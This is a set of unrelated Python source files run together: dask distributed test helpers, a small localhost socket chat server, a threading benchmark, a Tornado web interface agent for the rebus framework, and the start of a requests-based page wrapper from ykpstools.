]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
def wait_active_children(timeout: float) -> list[multiprocessing.Process]:
"""Wait until timeout for mp_context.active_children() to terminate.
Return list of active subprocesses after the timeout expired.
"""
t0 = time()
while True:
# Do not sample the subprocesses once at the beginning with
        # `for proc in mp_context.active_children(): ...`; assume instead that new
        # child processes may be spawned before the timeout expires.
children = mp_context.active_children()
if not children:
return []
join_timeout = timeout - time() + t0
if join_timeout <= 0:
return children
children[0].join(timeout=join_timeout)
def term_or_kill_active_children(timeout: float) -> None:
"""Send SIGTERM to mp_context.active_children(), wait up to 3 seconds for processes
to die, then send SIGKILL to the survivors
"""
children = mp_context.active_children()
for proc in children:
proc.terminate()
children = wait_active_children(timeout=timeout)
for proc in children:
proc.kill()
children = wait_active_children(timeout=30)
if children: # pragma: nocover
        logger.warning("Leaked unkillable child processes: %s", children)
# It should be impossible to ignore SIGKILL on Linux/MacOSX
assert WINDOWS
@contextmanager
def check_process_leak(
check: bool = True, check_timeout: float = 40, term_timeout: float = 3
):
"""Terminate any currently-running subprocesses at both the beginning and end of this context
Parameters
----------
check : bool, optional
If True, raise AssertionError if any processes survive at the exit
check_timeout: float, optional
Wait up to these many seconds for subprocesses to terminate before failing
term_timeout: float, optional
After sending SIGTERM to a subprocess, wait up to these many seconds before
sending SIGKILL
"""
term_or_kill_active_children(timeout=term_timeout)
try:
yield
if check:
children = wait_active_children(timeout=check_timeout)
assert not children, f"Test leaked subprocesses: {children}"
finally:
term_or_kill_active_children(timeout=term_timeout)
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status in Status.ANY_RUNNING:
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
    """WorkerPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
class LockedComm(TCP):
def __init__(self, comm, read_event, read_queue, write_event, write_queue):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.comm = comm
assert isinstance(comm, TCP)
def __getattr__(self, name):
return getattr(self.comm, name)
async def write(self, msg, serializers=None, on_error="message"):
if self.write_queue:
await self.write_queue.put((self.comm.peer_address, msg))
if self.write_event:
await self.write_event.wait()
return await self.comm.write(msg, serializers=serializers, on_error=on_error)
async def read(self, deserializers=None):
msg = await self.comm.read(deserializers=deserializers)
if self.read_queue:
await self.read_queue.put((self.comm.peer_address, msg))
if self.read_event:
await self.read_event.wait()
return msg
class _LockedCommPool(ConnectionPool):
"""A ConnectionPool wrapper to intercept network traffic between servers
This wrapper can be attached to a running server to intercept outgoing read or write requests in test environments.
Examples
--------
>>> w = await Worker(...)
>>> read_event = asyncio.Event()
>>> read_queue = asyncio.Queue()
>>> w.rpc = _LockedCommPool(
w.rpc,
read_event=read_event,
read_queue=read_queue,
)
# It might be necessary to remove all existing comms
# if the wrapped pool has been used before
>>> w.remove(remote_address)
>>> async def ping_pong():
return await w.rpc(remote_address).ping()
>>> with pytest.raises(asyncio.TimeoutError):
>>> await asyncio.wait_for(ping_pong(), 0.01)
>>> read_event.set()
>>> await ping_pong()
"""
def __init__(
self, pool, read_event=None, read_queue=None, write_event=None, write_queue=None
):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.pool = pool
def __getattr__(self, name):
return getattr(self.pool, name)
async def connect(self, *args, **kwargs):
comm = await self.pool.connect(*args, **kwargs)
return LockedComm(
comm, self.read_event, self.read_queue, self.write_event, self.write_queue
)
def xfail_ssl_issue5601():
"""Work around https://github.com/dask/distributed/issues/5601 where any test that
inits Security.temporary() crashes on MacOS GitHub Actions CI
"""
pytest.importorskip("cryptography")
try:
Security.temporary()
except ImportError:
if MACOS:
pytest.xfail(reason="distributed#5601")
raise
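# Usage sketch (an assumption about the calling convention, not from this file):
# call xfail_ssl_issue5601() at the top of any test that uses
# Security.temporary(), so the MacOS CI crash becomes an xfail instead:
#
#   def test_temporary_security():
#       xfail_ssl_issue5601()
#       sec = Security.temporary()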
def assert_worker_story(
story: list[tuple], expect: list[tuple], *, strict: bool = False
) -> None:
"""Test the output of ``Worker.story``
Parameters
==========
story: list[tuple]
Output of Worker.story
expect: list[tuple]
        Expected events. Each expected event must contain exactly two fewer fields than the
story (the last two fields are always the stimulus_id and the timestamp).
Elements of the expect tuples can be
- callables, which accept a single element of the event tuple as argument and
return True for match and False for no match;
- arbitrary objects, which are compared with a == b
e.g.
.. code-block:: python
expect=[
("x", "missing", "fetch", "fetch", {}),
("gather-dependencies", worker_addr, lambda set_: "x" in set_),
]
strict: bool, optional
If True, the story must contain exactly as many events as expect.
If False (the default), the story may contain more events than expect; extra
events are ignored.
"""
now = time()
prev_ts = 0.0
for ev in story:
try:
assert len(ev) > 2
assert isinstance(ev, tuple)
assert isinstance(ev[-2], str) and ev[-2] # stimulus_id
assert isinstance(ev[-1], float) # timestamp
assert prev_ts <= ev[-1] # Timestamps are monotonic ascending
# Timestamps are within the last hour. It's been observed that a timestamp
# generated in a Nanny process can be a few milliseconds in the future.
assert now - 3600 < ev[-1] <= now + 1
prev_ts = ev[-1]
except AssertionError:
raise AssertionError(
f"Malformed story event: {ev}\nin story:\n{_format_story(story)}"
)
try:
if strict and len(story) != len(expect):
raise StopIteration()
story_it = iter(story)
for ev_expect in expect:
while True:
event = next(story_it)
# Ignore (stimulus_id, timestamp)
event = event[:-2]
if len(event) == len(ev_expect) and all(
ex(ev) if callable(ex) else ev == ex
for ev, ex in zip(event, ev_expect)
):
break
except StopIteration:
raise AssertionError(
f"assert_worker_story({strict=}) failed\n"
f"story:\n{_format_story(story)}\n"
f"expect:\n{_format_story(expect)}"
) from None
def _format_story(story: list[tuple]) -> str:
if not story:
return "(empty story)"
return "- " + "\n- ".join(str(ev) for ev in story)
class BrokenComm(Comm):
peer_address = ""
local_address = ""
def close(self):
pass
def closed(self):
return True
def abort(self):
pass
def read(self, deserializers=None):
raise OSError()
def write(self, msg, serializers=None, on_error=None):
raise OSError()
def has_pytestmark(test_func: Callable, name: str) -> bool:
"""Return True if the test function is marked by the given @pytest.mark.<name>;
False otherwise.
FIXME doesn't work with individually marked parameters inside
@pytest.mark.parametrize
"""
marks = getattr(test_func, "pytestmark", [])
return any(mark.name == name for mark in marks)
|
server.py
|
import socket
import multiprocessing as mp
def chat(conn, addr):
    while True:
        msg = conn.recv(1024).decode("utf-8")
        if not msg:  # an empty result means the client closed the connection
            break
        conn.send((msg + " too").encode("utf-8"))
        print(addr, ": ", msg)
    conn.close()
if __name__ == "__main__":
sk = socket.socket()
sk.bind(("127.0.0.1", 9000))
sk.listen()
print("start server 127.0.0.1:9000 ...")
while True:
conn, addr = sk.accept()
mp.Process(target=chat, args=(conn, addr)).start()
sk.close()
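# Minimal client sketch for manual testing (illustrative, not part of this module):
#
#   import socket
#   c = socket.socket()
#   c.connect(("127.0.0.1", 9000))
#   c.send("hello".encode("utf-8"))
#   print(c.recv(1024).decode("utf-8"))  # -> "hello too"
#   c.close()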
|
thread_test.py
|
import time
import threading
from threading import Thread
from smac.examples.mlp import Mlp
import numpy as np
def threadFunc(threadName):
print("\r\n%s start" % threadName)
time.sleep(5)
print("\r\n%s end" % threadName)
pass
class AgentThread(Thread):
def __init__(self, agent_id, obs, avail_actions):
super(AgentThread, self).__init__()
self.agent_id = agent_id
self.obs = obs
self.avail_actions = avail_actions
def run(self):
start_time = time.time()
# print(f'thread {threading.current_thread().name} starts')
# avail_actions = env.get_avail_agent_actions(self.agent_id)
avail_actions_ind = np.nonzero(self.avail_actions)[0]
# obs = env.get_obs_agent(self.agent_id)
nn_model = Mlp(avail_actions_ind.size)
action_index = np.argmax(nn_model(np.expand_dims(np.array(self.obs), axis=0)))
self.action = avail_actions_ind[action_index]
# self.action = 4
run_time = time.time() - start_time
def get_action(self):
return self.agent_id, self.action
start = time.time()
threads = []
obs = np.random.random(size=(5050,)).astype(np.float32)
avail_actions = [1] * 16
for agent in range(1000):
# thread = threading.Thread(target=threadFunc, args=("Thread%s" % index,))
thread = AgentThread(agent, obs, avail_actions)
thread.start()
threads.append(thread)
for t in threads:
t.join()
print("thread finished , cost %s s" % (time.time() - start))
|
web_interface.py
|
import os
import os.path
from rebus.agent import Agent
import threading
import datetime
import time
import tornado.autoreload
import tornado.ioloop
import tornado.web
import tornado.template
from rebus.tools.selectors import guess_selector
from rebus.descriptor import Descriptor
import re
import json
class AsyncProxy(object):
"""
Provides methods for making API requests from the main thread.
When DBus is used, DBus method calls must not be called from the tornado
thread; symptoms include expired 25s DBus timeouts, during which the web
server freezes.
"""
def __init__(self, agent):
self._agent = agent
def __getattr__(self, attr):
if not attr.startswith('async_'):
raise AttributeError
method_name = attr[6:]
if hasattr(self, method_name + '_buscallback'):
method = None
bus_callback = getattr(self, method_name + '_buscallback')
else:
method = getattr(self._agent.bus, method_name)
def bus_callback(method, callback, *args):
results = method(self._agent, *args)
self._agent.ioloop.add_callback(callback, results)
# dbus-specific - indicates this method should only be called
# once
return False
def _async(callback, *args):
self._agent.bus.busthread_call(bus_callback, method, callback,
*args)
return _async
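    # Illustrative call pattern (a sketch inferred from __getattr__ above; the
    # exact bus methods and their arguments come from the rebus bus API):
    #
    #   proxy.async_get(callback, *args)
    #
    # runs self._agent.bus.get(self._agent, *args) on the bus thread and hands
    # the result to `callback` on the tornado IOLoop. Attributes for which a
    # matching *_buscallback method exists (see below) use that callback instead.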
def getwithvalue_buscallback(self, method, callback, *args):
"""
Ensures descriptor's values are retrieved before passing a descriptor
to the web server thread, to avoid DBus calls when the value @property
is read.
"""
desc = self._agent.bus.get(self._agent, *args)
if desc:
# force value retrieval
value = desc.value
self._agent.ioloop.add_callback(callback, desc)
return False
def find_by_uuid_withvalue_buscallback(self, method, callback, *args):
"""
Ensures descriptor's values are retrieved before passing a descriptor
to the web server thread, to avoid DBus calls when the value @property
is read.
"""
descs = self._agent.bus.find_by_uuid(self._agent, *args)
# force value retrieval
for desc in descs:
value = desc.value
self._agent.ioloop.add_callback(callback, descs)
return False
@Agent.register
class WebInterface(Agent):
_name_ = "web_interface"
_desc_ = "Display all descriptors exchanged on the bus in a web interface"
@classmethod
def add_arguments(cls, subparser):
subparser.add_argument(
'--autoreload', action='store_true',
help='Auto reload static files - use for development')
subparser.add_argument(
'-p', '--port', type=int, default=8080,
help='Specify alternate port')
def init_agent(self):
# Build list of async methods, to be used from the tornado thread
self.async_proxy = AsyncProxy(self)
self.dstore = DescriptorStore(self, self.async_proxy)
self.ioloop = tornado.ioloop.IOLoop.instance()
self.gui = Application(self.dstore, self.async_proxy, self.ioloop,
autoreload=self.config['autoreload'])
self.gui.listen(self.config['port'])
t = threading.Thread(target=self.ioloop.start)
t.daemon = True
t.start()
def process(self, descriptor, sender_id):
# tornado version must be >= 3.0
# force value retrieval
value = descriptor.value
self.ioloop.add_callback(self.dstore.new_descriptor, descriptor,
sender_id)
class CustomTemplate(tornado.template.Template):
"""
Keeps a dict of functions to be passed to the template at generation time.
Useful for preprocessing/formatting data.
For 'analysis' and 'monitor' actions, the RequestHandler is expected to
    pass a 'descrinfos' variable to the template, containing a dictionary.
For 'view' actions, the RequestHandler is expected to pass a descriptor
variable that contains the raw descriptor.
"""
def __init__(self, template_string, **kwargs):
if 'functions' in kwargs:
self._functions = kwargs['functions']
del kwargs['functions']
else:
self._functions = dict()
super(CustomTemplate, self).__init__(template_string, **kwargs)
def generate(self, **kwargs):
kwargs.update(self._functions)
return super(CustomTemplate, self).generate(**kwargs)
class TemplateLoader(tornado.template.Loader):
"""
Use parent class Loader to load any template other than descriptors.
To render descriptor of type "desctype" (first selector part, e.g.
"matrix"), for page "thepage", try to use
templates/descriptor/desctype_thepage. If it does not exist, use
templates/descriptor/default_thepage.
Load descriptor templates either from the descriptor/ folders, or using
agent-registered templates (allows agents that live outside the rebus
repository to specify how to render their custom desctypes).
To render any other type of templates (e.g. /analysis page), use static
template files in templates/
"""
#: contains descriptor templates that have been registered by external (out
    #: of rebus) agents, as well as static files that are part of rebus
templates = dict()
def __init__(self, root_directory=None, **kwargs):
"""
Register existing static files
"""
if not root_directory:
root_directory = os.path.join(os.path.dirname(__file__),
'templates')
super(TemplateLoader, self).__init__(root_directory, **kwargs)
for fname in os.listdir(os.path.join(root_directory, "descriptor")):
fullpath = os.path.join(root_directory, "descriptor", fname)
self.register_file_descriptor_template(fullpath, fname)
def register_file_descriptor_template(self, fullpath, fname):
if not (fname.endswith('.html') and os.path.isfile(fullpath)):
return
#: fname format: desctype_page.html
try:
selector_prefix, page = fname.rsplit('.', 1)[0].rsplit('_', 1)
except ValueError:
raise ValueError("Invalid descriptor template name %s" %
fullpath)
templatestr = open(fullpath, 'rb').read()
functions = dict()
TemplateLoader.register(selector_prefix, page, templatestr,
functions)
@staticmethod
def register(selector_prefix, page, templatestr, functions):
"""
        Called to register a rendering template for the given page and
descriptor type.
"""
TemplateLoader.templates[(selector_prefix, page)] = (templatestr,
functions)
@staticmethod
def register_formatted(template):
"""
Helper for registering templates and one associated formatter function.
        Syntactic sugar, to be used as a decorator for the formatter function.
Sample use:
@TemplateLoader.register_formatted(template='selector_prefix_page.html')
def formatter(...any args, called from template...):
where 'selector_prefix_page.html' is present under the
formatted_templates/ directory under module where this decorator is
being used.
This template will be used on specified page, for selectors beginning
with /selector/prefix, unless another registered template has a longer
selector prefix (e.g. selector_prefix_very_specific_page.html)
"""
def func_wrapper(f):
fpath = os.path.dirname(f.__globals__['__file__'])
templatefile = os.path.join(fpath, 'formatted_templates', template)
            with open(templatefile, 'rb') as tfile:
                templatestr = tfile.read()
selector_prefix, page = template.rsplit('.', 1)[0].rsplit('_', 1)
funcdict = {f.__name__: f}
TemplateLoader.register(selector_prefix, page, templatestr,
funcdict)
return f
return func_wrapper
def resolve_path(self, name, parent_path=None):
name = super(TemplateLoader, self).resolve_path(name, parent_path)
return name
def _create_template(self, name):
"""
Return the requested template object.
"""
if not name.startswith('descriptor/'):
return super(TemplateLoader, self)._create_template(name)
        # '/' (part of selector) is encoded as '_' in template file names
        # ('_' is forbidden in selectors).
        # name[11:] strips the leading 'descriptor/' prefix from the name.
        selector, page = name[11:].replace('/', '_').rsplit('_', 1)
        args = dict()
        args['loader'] = self
# iterate to find template with longest selector prefix
desc_prefix = ""
for (d, p) in TemplateLoader.templates:
if page != p:
continue
if selector.startswith(d) and len(d) > len(desc_prefix):
desc_prefix = d
if desc_prefix != "":
# load most specific template if exists
templatestr, funcs = TemplateLoader.templates[(desc_prefix, page)]
else:
# use default otherwise
templatestr, funcs = TemplateLoader.templates[('default', page)]
args['functions'] = funcs
template = CustomTemplate(templatestr, **args)
return template
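# Illustrative sketch (not part of the original module): registering templates
# for a hypothetical 'matrix' descriptor type. When _create_template resolves
# 'descriptor/matrix/dense_monitor', it picks the 'matrix_dense' entry over
# the plain 'matrix' one because its selector prefix is longer.
def _example_register_templates():
    TemplateLoader.register('matrix', 'monitor',
                            '<span>{{ descriptor["label"] }}</span>', dict())
    TemplateLoader.register('matrix_dense', 'monitor',
                            '<table>{{ descriptor["label"] }}</table>', dict())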
class Application(tornado.web.Application):
def __init__(self, dstore, async, ioloop, autoreload):
handlers = [
(r"/", tornado.web.RedirectHandler, {'url': '/monitor'}),
(r"/monitor", MonitorHandler),
(r"/inject", InjectHandler),
(r"/uuid/(.*)", AnalysisListHandler),
(r"/analysis(|/.*)", AnalysisHandler),
(r"/selectors", SelectorsHandler),
(r"/poll_descriptors", DescriptorUpdatesHandler),
(r"/get([^\?]*)\??.*", DescriptorGetHandler),
(r"/agents", AgentsHandler),
(r"/processing/list_processors", ProcessingListHandler),
(r"/processing/request", ProcessingRequestsHandler),
]
params = {
'static_path': os.path.join(os.path.dirname(__file__), 'static'),
'template_loader': TemplateLoader()
}
if autoreload:
params['autoreload'] = True
for path in ('templates', 'static'):
                for d, _, files in os.walk(
                        os.path.join(os.path.dirname(__file__), path)):
for f in files:
tornado.autoreload.watch(os.path.join(d, f))
self.dstore = dstore
self.async = async
self.ioloop = ioloop
tornado.web.Application.__init__(self, handlers, **params)
class DescriptorStore(object):
def __init__(self, agent, async):
self.async = async
#: self.waiters is a set of (domain, uuid, callback) for new
#: descriptors on specified uuid and domain
#: "domain" and "uuid" may be empty for callback to be called on any
#: value
self.waiters = set()
#: Most recent descriptor is in self.cache[-1].
#: The cache is used:
#:
#: * in the Bus Monitor view when a user first loads the page
#: * in every page that updates dynamically, to cache descriptors
#: between two (long) pollings
self.cache = []
self.cache_size = 200
def wait_for_descriptors(self, callback, domain, uuid, page, cursor):
"""
:param callback: callback function, will be called when necessary
:param domain: domain filter. Empty if any
:param uuid: uuid filter. Empty if any
:param cursor: 'cached', 'all', or hash of the most recent displayed
descriptors.
:param page: string parameter to be passed to callback()
Returns matching descriptor information if available.
Else, registers callback to be called when a matching descriptor is
received.
Usage scenarios:
* Fetch any old descriptor matching uuid and domain. Wait if none
match.
* Fetch matching cached descriptors (domain and uuid may or may not be
specified).
"""
matching_infos = []
if cursor == 'all':
# Search whole bus
# Domain or uuid must be defined
# Wait if none have been found
if domain and uuid:
self.async.async_find_by_uuid_withvalue(callback, domain, uuid)
return
else:
# Return cached descriptors that are newer than cursor (all cached
# if cursor is not in cache anymore).
# Also works for cursor == 'cached'
new_count = 0
for desc in reversed(self.cache):
if desc.hash == cursor:
break
new_count += 1
if new_count > 0:
# New descriptors are available. Send them if they match.
for desc in self.cache[-new_count:]:
if domain == desc.domain or not domain:
if uuid == desc.uuid or not uuid:
matching_infos.append(desc)
if matching_infos:
callback(matching_infos)
return
# No new matching descriptors have been found, start waiting
self.add_to_waitlist(domain, uuid, callback)
def add_to_waitlist(self, domain, uuid, callback):
"""
:param callback: method of a RequestHandler instance
"""
self.waiters.add((domain, uuid, callback))
def info_from_descs(self, descriptors):
"""
:param descriptors: list of descriptors
        Return a list of descriptor summary dictionaries
"""
descrinfos = []
for desc in descriptors:
printablevalue = desc.value if isinstance(desc.value, unicode) \
else ''
if len(printablevalue) > 80:
printablevalue = (printablevalue[:80] + '...')
descrinfo = {
'hash': desc.hash,
'domain': desc.domain,
'uuid': desc.uuid,
'agent': desc.agent,
'selector': desc.selector.partition('%')[0],
'fullselector': desc.selector,
'label': desc.label,
'printablevalue': printablevalue,
'processing_time': format(desc.processing_time, '.3f'),
'precursors': desc.precursors,
'version': desc.version,
}
if desc.selector.startswith('/link/'):
descrinfo['value'] = desc.value
descrinfo['linksrchash'] = desc.value['selector'].split('%')[1]
descrinfos.append(descrinfo)
return descrinfos
def cancel_wait(self, callback):
for (domain, uuid, cb) in set(self.waiters):
if callback == cb:
self.waiters.remove((domain, uuid, cb))
def new_descriptor(self, descriptor, sender_id):
"""
:param descriptor: new descriptor
:param sender_id: sender agent ID
Callback function
Called whenever a new descriptor is available (received from bus, or
injected by web_interface)
"""
for (domain, uuid, callback) in list(self.waiters):
if domain == descriptor.domain or not domain:
if uuid == descriptor.uuid or not uuid:
callback([descriptor])
self.waiters.remove((domain, uuid, callback))
self.cache.append(descriptor)
if len(self.cache) > self.cache_size:
self.cache = self.cache[-self.cache_size:]
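# Illustrative sketch (not part of the original module): the cursor protocol
# used by DescriptorUpdatesHandler below. A client first polls with
# cursor='cached', then polls again with the hash of the newest descriptor it
# has seen; cursor='all' queries the bus itself and requires both domain and
# uuid. The callback here only summarizes descriptors and is hypothetical.
def _example_poll(dstore, domain, uuid, last_seen_hash):
    def on_descriptors(descs):
        return dstore.info_from_descs(descs)
    dstore.wait_for_descriptors(on_descriptors, domain, uuid,
                                'monitor', last_seen_hash)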
class AnalysisHandler(tornado.web.RequestHandler):
def get(self, uuid=''):
"""
URL format: /analysis (blank page)
/analysis/domain/aaaaaaaa-1234-5678-abcd-123456789abc
"""
if uuid not in ('', '/') and\
not re.match('/[a-zA-Z0-9-_]+/[0-9a-fA-F-]{36}', uuid):
# invalid uuid
self.send_error(400)
return
self.render('analysis.html', uuid=uuid)
class AnalysisListHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self, domain):
if domain == '':
domain = 'default'
self.domain = domain
self.application.async.async_list_uuids(self.send_results_cb, domain)
def send_results_cb(self, uuid_label):
if self.request.connection.stream.closed():
return
self.render('uuid.html', domain=self.domain,
selectors=sorted(uuid_label.items(), key=lambda x: x[1]))
class SelectorsHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self):
self.application.async.async_find(
self.get_selectors_cb,
self.get_argument('domain', 'default'), '/.*', 100)
def get_selectors_cb(self, sels):
self.render('selectors.html', selectors=sorted(sels))
class MonitorHandler(tornado.web.RequestHandler):
def get(self):
self.render('monitor.html')
class DescriptorUpdatesHandler(tornado.web.RequestHandler):
"""
Dispatches descriptors to web clients.
"""
@tornado.web.asynchronous
def post(self):
self.cursor = self.get_argument('cursor')
self.page = self.get_argument('page')
self.domain = self.get_argument('domain')
self.uuid = self.get_argument('uuid')
self.application.dstore.wait_for_descriptors(self.on_new_descriptors,
self.domain, self.uuid,
self.page, self.cursor)
def on_new_descriptors(self, descs):
if self.request.connection.stream.closed():
return
if not descs:
self.application.dstore.add_to_waitlist(self.domain, self.uuid,
self.on_new_descriptors)
return
descrinfos = self.application.dstore.info_from_descs(descs)
#: Contains only data from descrinfos needed to render page
infos = []
for d in descrinfos:
info = {}
infos.append(info)
for k in ('hash', 'selector', 'fullselector', 'printablevalue',
'agent', 'domain', 'label', 'linksrchash',
'version', 'processing_time'):
if k in d:
info[k] = d[k]
if self.page in ('monitor', 'analysis'):
d['html_' + self.page] = \
self.render_string('descriptor%s_%s' % (d['selector'],
self.page),
descriptor=d)
info['html'] = d['html_' + self.page]
self.finish(dict(descrinfos=infos))
def on_connection_close(self):
self.application.dstore.cancel_wait(self.on_new_descriptors)
class DescriptorGetHandler(tornado.web.RequestHandler):
"""
Handles requests for descriptor values.
Values are requested through the bus.
URL format: /get/sel/ector/%1234?domain=default&download=1
The forward slash after "/get" is part of the selector
The selector hash (ex. %1234...) may be replaced with a version (ex. ~-1)
"""
@tornado.web.asynchronous
def get(self, selector='', *args, **kwargs):
domain = self.get_argument('domain', 'default')
self.application.async.async_getwithvalue(self.process_get_results,
domain, selector)
def process_get_results(self, desc):
download = (self.get_argument('download', '0') == '1')
if desc is None:
self.send_error(status_code=404)
return
value = desc.value
if download:
self.set_header('Content-Disposition', 'attachment; filename=%s' %
tornado.escape.url_escape(desc.label))
self.finish(str(value))
else:
if type(value) is list:
self.finish(json.dumps(dict(list=value)))
elif type(value) is dict:
self.finish(json.dumps(value))
else:
self.render('descriptor%s_view' % desc.selector,
descriptor=desc)
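# Illustrative sketch (not part of the original module): fetching a descriptor
# value through DescriptorGetHandler from an external client. Host, port and
# selector are hypothetical, and the 'requests' library is assumed to be
# available; download=1 triggers the attachment code path above.
def _example_get_descriptor_value():
    import requests
    url = 'http://localhost:8080/get/sel/ector/~-1'
    resp = requests.get(url, params={'domain': 'default', 'download': '1'})
    return resp.content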
class InjectHandler(tornado.web.RequestHandler):
"""
    Injects a file into the bus.
"""
def post(self, *args, **kwargs):
t0 = time.time()
self.f = self.request.files['file'][0]
self.filename = self.f['filename']
value = self.f['body']
domain = self.get_argument('domain', 'default')
force_inject = self.get_argument('force_inject', False)
if force_inject is not False:
force_inject = True
agentname = 'web_interface_inject'
selector = guess_selector(buf=value, label=self.filename)
t1 = time.time()
if force_inject:
create_new = Descriptor.new_with_randomhash
else:
create_new = Descriptor
filedesc = create_new(self.filename, selector, value, domain,
agent=agentname, processing_time=t1-t0)
self.uuid = filedesc.uuid
self.desc = filedesc
self.application.async.async_push(self.process_inject_results,
self.desc)
submission_data = {'filename': self.filename,
'date': datetime.datetime.now().isoformat()}
t2 = time.time()
submdesc = filedesc.spawn_descriptor('/submission/',
submission_data,
agentname, processing_time=t2-t1)
self.desc = submdesc
self.application.async.async_push(self.process_inject_results,
submdesc)
self.finish(dict(uuid=self.uuid, filename=self.filename))
def process_inject_results(self, result):
pass
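# Illustrative sketch (not part of the original module): injecting a file into
# the bus through InjectHandler from an external client. Host, port and file
# name are hypothetical; the 'requests' library is assumed to be available.
def _example_inject_file():
    import requests
    with open('sample.bin', 'rb') as fin:
        resp = requests.post(
            'http://localhost:8080/inject',
            data={'domain': 'default', 'force_inject': '1'},
            files={'file': ('sample.bin', fin.read())})
    return resp.json()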
class ProcessingListHandler(tornado.web.RequestHandler):
"""
Lists (agents, config) that could process this descriptor
"""
@tornado.web.asynchronous
def post(self, *args, **kwargs):
domain = self.get_argument('domain')
selector = self.get_argument('selector')
self.application.async.async_get_processable(
self.processing_list_cb, str(domain), str(selector))
def processing_list_cb(self, agents):
agents = [(name, ', '.join(
["%s=%s" % (k, v) for (k, v) in json.loads(config_txt).items()]
)) for (name, config_txt) in agents]
self.finish(self.render_string('request_processing_popover.html',
agents=agents))
class ProcessingRequestsHandler(tornado.web.RequestHandler):
"""
Requests processing of this descriptor by listed agents
"""
def post(self, *args, **kwargs):
params = json.loads(self.request.body)
        if not all([i in params for i in ('domain', 'selector', 'targets')]):
            self.send_error(400)
            return
        if not all([isinstance(i, unicode) for i in params['targets']]):
            self.send_error(400)
            return
self.application.async.async_request_processing(
lambda x: None,
str(params['domain']),
str(params['selector']),
list(params['targets']))
self.finish()
class AgentsHandler(tornado.web.RequestHandler):
"""
Displays information about agents.
"""
def get(self):
self.render('agents.html')
@tornado.web.asynchronous
def post(self, *args, **kwargs):
# TODO fetch agents descriptions
domain = self.get_argument('domain', 'default')
self.application.async.async_processed_stats(self.agents_cb1, domain)
def agents_cb1(self, params):
self.processed, self.total = params
self.application.async.async_list_agents(self.agents_cb2)
def agents_cb2(self, res):
agent_count = {k: [k, v, 0] for k, v in res.items()}
for agent, nbprocessed in self.processed:
if agent in agent_count:
# agent is still registered
agent_count[agent][2] = nbprocessed
stats = list()
for agent in sorted(agent_count):
stats.append(agent_count[agent])
self.finish(dict(agents_stats=stats, total=self.total))
|
page.py
|
"""Class 'Page' is a wrapper around requests.Response with convenient
functions.
"""
__all__ = ['Page', 'LoginPageBase', 'AuthPage', 'PowerschoolPage',
'MicrosoftPage', 'PowerschoolLearningPage']
__author__ = 'Thomas Zhu'
import abc
import base64
import hashlib
import hmac
import json
import os
import re
import socket
import subprocess
import sys
import threading
import uuid
from urllib.parse import urlparse, urljoin
import requests
from bs4 import BeautifulSoup
from ykpstools.exceptions import WrongUsernameOrPassword, GetIPError
class Page(abc.ABC):
"""Class 'Page' is a wrapper around requests.Response with convenient
functions.
"""
def __init__(self, user, response):
"""Initialize a Page.
user: a ykpstools.user.User instance, the User this page belongs to,
response: a requests.Response instance or
a ykpstools.page.Page instance.
"""
self.user = user
if isinstance(response, requests.Response):
self.response = response
elif isinstance(response, Page):
self.response = response.response
def url(self, *args, **kwargs):
"""Get current URL.
        *args: arguments for urllib.parse.urlparse,
        **kwargs: keyword arguments for urllib.parse.urlparse."""
return urlparse(self.response.url, *args, **kwargs)
def text(self, encoding=None):
"""Returns response text.
encoding=None: encoding charset for HTTP, defaults to obtain from
headers.
"""
if encoding is not None:
self.response.encoding = encoding
return self.response.text
def soup(self, features='lxml', *args, **kwargs):
"""Returns bs4.BeautifulSoup of this page.
features='lxml': 'features' keyword argument for BeautifulSoup,
*args: arguments for BeautifulSoup,
**kwargs: keyword arguments for BeautifulSoup.
"""
return BeautifulSoup(self.text(), features=features, *args, **kwargs)
def CDATA(self):
"""Gets the CDATA of this page."""
return json.loads(re.findall(
r'//<!\[CDATA\[\n\$Config=(.*?);\n//\]\]>', self.text())[0])
def form(self, *find_args, **find_kwargs):
"""Gets HTML element form as bs4.element.Tag of this page.
*find_args: arguments for BeautifulSoup.find('form'),
**find_kwargs: keyword arguments for BeautifulSoup.find('form').
"""
return self.soup().find('form', *find_args, **find_kwargs)
